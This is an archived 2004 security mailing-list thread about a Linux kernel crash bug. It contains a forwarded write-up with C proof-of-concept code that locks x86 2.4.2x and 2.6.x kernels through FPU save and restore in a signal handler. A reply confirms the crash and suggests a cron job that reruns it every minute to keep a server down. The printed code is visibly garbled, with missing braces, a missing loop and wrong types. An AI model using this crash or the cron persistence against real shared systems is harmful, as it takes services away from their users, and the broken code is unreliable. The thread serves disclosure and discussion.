Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
[VulnDiscuss] RE: [VulnWatch] Kernel Exploit?
From: Hamlesh Motah (adminhamlesh.com)
Date: Wed Jun 16 2004 - 02:37:54 CDT
This worked on one of my local test bed machines, Linux version 2.4.22.
This particularly made me laugh;
"If your system is a production server with 1000 on line users then do
not test this code on that box."
A user with shell access, and access to cron could setup a job that runs
every minute to execute this, taking the system down almost as soon as
it comes back up. You wouldn't really be able to tell what the heck was
tel: +44 (0)709 212 0732
fax: +44 (0)709 212 0732
Hamlesh Consultants - IT Consultancy - Total Solutions Provider.
The Information contained in this E-Mail and any subsequent
correspondence is private and is intended solely for the intended
recipient(s). For those other than the recipient any disclosure,
copying, distribution, or any action taken or omitted to be taken in
reliance on such information is prohibited and may be unlawful.
: -----Original Message-----
: From: JM [mailto:jeromegmanmi.tv]
: Sent: 15 June 2004 05:22
: To: vulnwatchvulnwatch.org
: Subject: [VulnWatch] Kernel Exploit?
: im wondering if this is true... tried it in one of my LAN
: boxes but it seems
: it didnt work...
: New Kernel Crash-Exploit discovered
: A bug lets a simple C program crash the kernel, effectively
: locking the
: whole system. Affects both 2.4.2x and 2.6.x kernels on the
: x86 architecture.
: The Evil Code
: Running this simple C program crashes the Linux kernel.
: #include <sys/time.h>
: #include <signal.h>
: #include <unistd.h>
: static void Handler(int ignore)
: char fpubuf;
: __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
: write(2, "*", 1);
: __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
: int main(int argc, char *argv)
: struct itimerval spec;
: signal(SIGALRM, Handler);
: setitimer(ITIMER_REAL, &spec, NULL);
: write(1, ".", 1);
: return 0;
: This bug is confirmed to be present when the code is compiled
: with GCC
: version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: versions 2.4.2x and 2.6.x on x86 and amd64 systems.
: The threat
: Using this exploit to crash Linux systems requires the
: (ab)user to have
: shell access or other means of uploading and running the
: program (like
: cgi-bin and FTP access). The program works on any normal user
: root access is not required. This exploit has been reported
: used to take
: down several "lame free-shell providers" servers (running
: code you know
: will damage a system intentionally and hacking in general is
: illegal in
: most parts of the world and strongly discouraged).
: This code only works on x86 Linux machines. This code does
: not compile
: (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird).
: This doesn't affect NetBSD Stable.
: SMP systems can be compromised, but a separate instance of
: the program
: is required for each CPU before the system halts. Each
: instance of the
: program code will lock one CPU and this process can not be killed. If
: you have two CPUs the second instance of the program kills the entire
: Check your own system yourself if you are wondering if this
: affects you.
: Better safe than sorry. Assume it will crash, sync (even
: unmount) your
: file systems before testing. If your system is a production
: server with
: 1000 on line users then do not test this code on that box.